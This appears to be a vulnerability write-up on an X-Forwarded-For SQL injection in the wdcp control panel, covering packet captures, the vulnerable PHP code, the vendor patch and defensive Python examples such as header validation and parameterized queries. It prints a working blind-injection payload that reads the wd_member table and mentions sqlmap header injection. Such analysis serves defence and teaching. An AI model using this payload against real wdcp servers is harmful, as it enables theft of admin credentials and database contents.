Wdcp X-Forwarded-For Injection Vulnerability Analysis

Source: Internet
Author: User


0x1. Vulnerability updates on the official website:

20130804 (2.5.8)

Fixed an SQL injection security vulnerability that leaks database information (upgrade required)


Description: version 2.5.7 and earlier have the injection vulnerability. The user name and password of the wdcp back end, and in fact the data of the whole wdcp database, can be obtained directly.
Affected versions: 2.5.7 and earlier; the latest version is v2.5.11.

0x2. Vulnerability principle analysis

The vulnerability can be analyzed either from the patch or from the wdcp X-Forwarded-For injection tool that circulates on the Internet (the download link can be found with a Baidu search). Compared with patch analysis, the payload of this tool makes the vulnerability details easier to find. First, build a v2.5.7 environment.
How do you analyze the payload? Use wireshark to capture the packets the tool sends.
We only care about the data the tool requests and the data the server returns over HTTP, so the wireshark display filter is written as: ip.addr == xx.xx.xx.xx and http. Then start capturing and enter the vulnerable ip address in the injection tool.



Click Batch Injection. Wireshark now captures the payload of the entire injection process, and the rest is a matter of analyzing the captured packets. 192.168.0.102 is the ip address of my local NIC, and packet 458 is a GET request sent from the local machine to the server. The request content is completely normal. Packet 456 is the data returned by the server; since a normal request was submitted, the normal page is returned and its length is 989 bytes. So we can conclude: if the returned result is not 989 bytes long, the corresponding request was not a normal GET submission.
Continue to the GET request content of packet 486: X-Forwarded-For: 127.0.0.1'\r\n. The \r\n is the line break and can be ignored; what matters is the single quotation mark after 127.0.0.1. Then look at the returned content of packet 484: it is only 54 bytes long, and the Line-based text data: text/html (that is, the HTML the page returned) reads MySQL Query Error:select ltime from wd_loginlog where lip='127.0.0.1'' and state=1 order by id desc limit 10,1<br>. Finally, note that the injected page is the homepage on port 8080.
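To turn the two observations above (a response length that deviates from the 989-byte baseline, and an X-Forwarded-For value that is not an IP address) into a repeatable check, here is an added Python example; it is not part of the original post and not wdcp code. The request/response records are constructed to mirror packets 458/456 and 486/484; packets 502 and 530 and their contents are made up for illustration. It also shows the limit of the length heuristic: a boolean-blind request that gets the normal page back is only caught by inspecting the header value itself.

```python
import ipaddress

BASELINE_LEN = 989                  # length of the normal homepage response seen in the capture
SQL_ERROR_MARKER = "MySQL Query Error"

# Constructed sample records (NOT real capture data), mirroring the situations
# described in the Wireshark analysis: a normal request, the single-quote probe,
# a legitimate proxy chain, and a boolean-blind request that returns a normal page.
SAMPLE_PAIRS = [
    {"pkt": 458, "xff": None, "resp_len": 989,
     "body": "<html>...normal page...</html>"},
    {"pkt": 486, "xff": "127.0.0.1'", "resp_len": 54,
     "body": "MySQL Query Error:select ltime from wd_loginlog where lip='127.0.0.1'' "
             "and state=1 order by id desc limit 10,1<br>"},
    {"pkt": 502, "xff": "10.0.0.5, 192.168.0.1", "resp_len": 989,
     "body": "<html>...normal page...</html>"},
    {"pkt": 530, "xff": "127.0.0.1' AND 'rRyy'='rRyy", "resp_len": 989,
     "body": "<html>...normal page...</html>"},
]


def xff_is_clean(value):
    """True only if every comma-separated element parses as an IP address.
    X-Forwarded-For legitimately carries a chain 'client, proxy1, proxy2'."""
    if value is None:
        return True
    for part in value.split(","):
        try:
            ipaddress.ip_address(part.strip())
        except ValueError:
            return False
    return True


def classify(pair, baseline_len=BASELINE_LEN):
    """Return the list of findings for one request/response pair."""
    findings = []
    if not xff_is_clean(pair["xff"]):
        findings.append("xff_not_ip")          # header carries something other than addresses
    if pair["resp_len"] != baseline_len:
        findings.append("length_deviates")     # the 989-byte heuristic from the capture
    if SQL_ERROR_MARKER in pair["body"]:
        findings.append("sql_error_leak")      # database error text reached the client
    return findings


def scan(pairs):
    """Map packet number -> findings for every pair that has at least one finding."""
    return {p["pkt"]: classify(p) for p in pairs if classify(p)}


if __name__ == "__main__":
    for pkt, found in scan(SAMPLE_PAIRS).items():
        print(pkt, found)
```

Packet 530 is the instructive case: its length and body look exactly like packet 458, so the baseline check says nothing, while the header check flags it. The same idea applies when scanning web server logs, provided the server is configured to log the X-Forwarded-For header.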


After analyzing this far, the injection point and the vulnerable file can be searched for.
Decrypting the wdcp code: I wrote about that in my previous blog post. Then use notepad++ (with the Light Explorer plug-in installed) to search the wdcp directory for: select ltime from wd_loginlog where lip


The injection occurs in member.func.php; the key code (the body of the function, whose header is not shown here) is as follows:

    global $db;
    $ip=get_client_ip();                       // client IP, taken from request headers
    // $ip is interpolated into the SQL string without escaping
    $q=$db->query("select ltime from wd_loginlog where lip='$ip' and state=1 order by id desc limit 10,1");
    $r=$db->fetch_array($q);
    $ctime=time();
    if ($ctime-$r['ltime']<1800) return 1;     // entry 10 back for this IP is under 30 minutes old
    $q=$db->query("select ltime from wd_loginlog where lip='$ip' and state=1 order by id desc limit 2,1");
    $r=$db->fetch_array($q);
    $ctime=time();
    if ($ctime-$r['ltime']<120) return 1;      // entry 2 back for this IP is under 2 minutes old
    else return 0;
    }


From the payload analysis above we can see that $ip is the injection point, so trace where $ip comes from: $ip=get_client_ip();. $ip is obtained from the get_client_ip function, whose code is below. PS: function names in PHP are case-insensitive, which is why get_client_ip() resolves to Get_client_ip().
fun.inc.php

    function Get_client_ip(){
        // each header is trusted as-is; X-Forwarded-For is fully client-controlled
        if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
            $ip = getenv("HTTP_CLIENT_IP");
        else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
            $ip = getenv("HTTP_X_FORWARDED_FOR");
        else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
            $ip = getenv("REMOTE_ADDR");
        else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
            $ip = $_SERVER['REMOTE_ADDR'];
        else
            $ip = "unknown";
        return $ip;                            // returned unfiltered
    }


As you can see, $ip can be taken directly from X-Forwarded-For, and it is not filtered at all. Now look at the fix in the latest version: at the end it is obvious that *, ' and " are stripped from $ip, which prevents the injection.

    function Get_client_ip(){
        // echo getenv("HTTP_X_FORWARDED_FOR");
        if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
            $ip = getenv("HTTP_CLIENT_IP");
        else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
            $ip = getenv("HTTP_X_FORWARDED_FOR");
        else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
            $ip = getenv("REMOTE_ADDR");
        else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
            $ip = $_SERVER['REMOTE_ADDR'];
        else
            $ip = "unknown";
        // echo $ip;
        return preg_replace("/\*|'|\"/isU", "", $ip);   // filter this: strip *, ' and "
        // return str_replace("*", "", $ip);
        // return $ip;
    }


Having analyzed the cause of the vulnerability, let's look at how the vulnerability payload is used.
At first glance this looks like error-based injection, but that did not succeed in my test (it does succeed locally), so note that it is actually a blind injection, guessing one character at a time.
Go back to wireshark and look at the complete payload. Pick a packet whose request contains the injection code but whose response is the normal page. Its header is X-Forwarded-For: 127.0.0.1' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(name AS CHAR),0x20) FROM wdcpdb.wd_member ORDER BY id LIMIT 0,1),1,1))=97) THEN 0x3132372e302e302e31 ELSE 0x28 END)) AND 'rRyy'='rRyy\r\n
The complete SQL is: select ltime from wd_loginlog where lip='127.0.0.1' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(name AS CHAR),0x20) FROM wdcpdb.wd_member ORDER BY id LIMIT 0,1),1,1))=97) THEN 0x3132372e302e302e31 ELSE 0x28 END)) AND 'rRyy'='rRyy' and state=1 order by id desc limit 10,1
It tests whether the ascii value of the first character of the name field in the first row (ordered by id) of the wdcpdb.wd_member table is 97, the character a. If it is, the normal page is returned, and the simplified SQL is select ltime from wd_loginlog where lip='127.0.0.1' RLIKE(select 0x3132372e302e302e31) AND 'rRyy'='rRyy' and state=1 order by id desc limit 10,1 (0x3132372e302e302e31 is the string 127.0.0.1). If it is not, an error is reported, and the simplified SQL is select ltime from wd_loginlog where lip='127.0.0.1' RLIKE(select 0x28) AND 'rRyy'='rRyy' and state=1 order by id desc limit 10,1, where 0x28 is the character ( and, being an invalid regular expression, makes RLIKE raise an error.
The normal usage of RLIKE is select * from table where column RLIKE 'a.*'. In this example,
select * from table where column = 'xx' RLIKE 0x28 reports an error, while RLIKE 0x30 (the character 0) does not.



If you know the vulnerable page and understand the payload, you can hand it straight to sqlmap: sqlmap.py -r with a saved request file performs the HTTP header injection.

0x3. Fix

Upgrade to the latest version, 2.5.11. Alternatively, change return $ip; to return preg_replace("/\*|'|\"/isU","",$ip); and then re-encrypt the file with the wdcp encryption method.
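The patch above strips *, ' and " from $ip but still builds the SQL by string concatenation, so it is a character blacklist rather than a structural fix. As an added example (not wdcp's code; written in Python, with an in-memory sqlite3 database standing in for MySQL), the following contrasts three treatments of the exact value seen in packet 486: the page's character-stripping filter, validating the header as an IP address and falling back to REMOTE_ADDR otherwise, and binding the value as a query parameter. The wd_loginlog table layout and its rows are constructed from the columns the article's query names and are not wdcp's real schema; the function names and the demo() helper are mine.

```python
import ipaddress
import re
import sqlite3


def wdcp_patch_filter(ip):
    """Python equivalent of the 2.5.8 fix, preg_replace("/\\*|'|\\"/isU", "", $ip).
    It removes *, ' and " but does not check that what remains is an address."""
    return re.sub(r"[*'\"]", "", ip)


def client_ip_from_headers(env):
    """Same header precedence as Get_client_ip(), but a client-supplied header is only
    used if it parses as an IP address; otherwise REMOTE_ADDR (set by the web server,
    not by the client) is used."""
    for name in ("HTTP_CLIENT_IP", "HTTP_X_FORWARDED_FOR"):
        raw = env.get(name)
        if not raw or raw.lower() == "unknown":
            continue
        candidate = raw.split(",")[0].strip()   # X-Forwarded-For may carry a proxy chain
        try:
            return str(ipaddress.ip_address(candidate))
        except ValueError:
            break                                # tampered value: stop trusting client headers
    return env.get("REMOTE_ADDR", "unknown")


def setup_db():
    """Constructed stand-in for wd_loginlog (columns taken from the article's query)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wd_loginlog (id INTEGER PRIMARY KEY, lip TEXT, "
                 "state INTEGER, ltime INTEGER)")
    conn.executemany("INSERT INTO wd_loginlog (lip, state, ltime) VALUES (?, ?, ?)",
                     [("127.0.0.1", 1, 1000), ("127.0.0.1", 1, 1100), ("10.0.0.9", 1, 1200)])
    return conn


def ltime_vulnerable(conn, ip, offset=0):
    """The string-built query from member.func.php: $ip becomes part of the SQL text."""
    sql = (f"select ltime from wd_loginlog where lip='{ip}' and state=1 "
           f"order by id desc limit {offset},1")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def ltime_parameterized(conn, ip, offset=0):
    """Same query with the IP bound as a parameter: the driver never lets it alter the SQL."""
    sql = ("select ltime from wd_loginlog where lip=? and state=1 "
           "order by id desc limit ?,1")
    row = conn.execute(sql, (ip, offset)).fetchone()
    return row[0] if row else None


def demo():
    """Run all three treatments on the packet-486 value and collect the outcomes."""
    conn = setup_db()
    tampered = "127.0.0.1'"                    # the X-Forwarded-For value from packet 486
    env = {"HTTP_X_FORWARDED_FOR": tampered, "REMOTE_ADDR": "192.168.0.102"}
    results = {
        "filtered": wdcp_patch_filter(tampered),          # quote stripped, address kept
        "validated": client_ip_from_headers(env),         # header rejected, REMOTE_ADDR used
        "parameterized": ltime_parameterized(conn, tampered),  # literal match, no row
        "honest": ltime_parameterized(conn, "127.0.0.1"),      # most recent state=1 entry
    }
    try:
        ltime_vulnerable(conn, tampered)
        results["vulnerable"] = "no error"
    except sqlite3.OperationalError:
        results["vulnerable"] = "sql error"   # same failure mode as the MySQL Query Error above
    return results


if __name__ == "__main__":
    print(demo())
```

The parameterized variant is the durable fix because it works for any input, whereas the stripping filter only removes the characters someone thought of; validating the header with ipaddress additionally keeps the login-rate-limit logic from being keyed on a value the client can choose freely.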
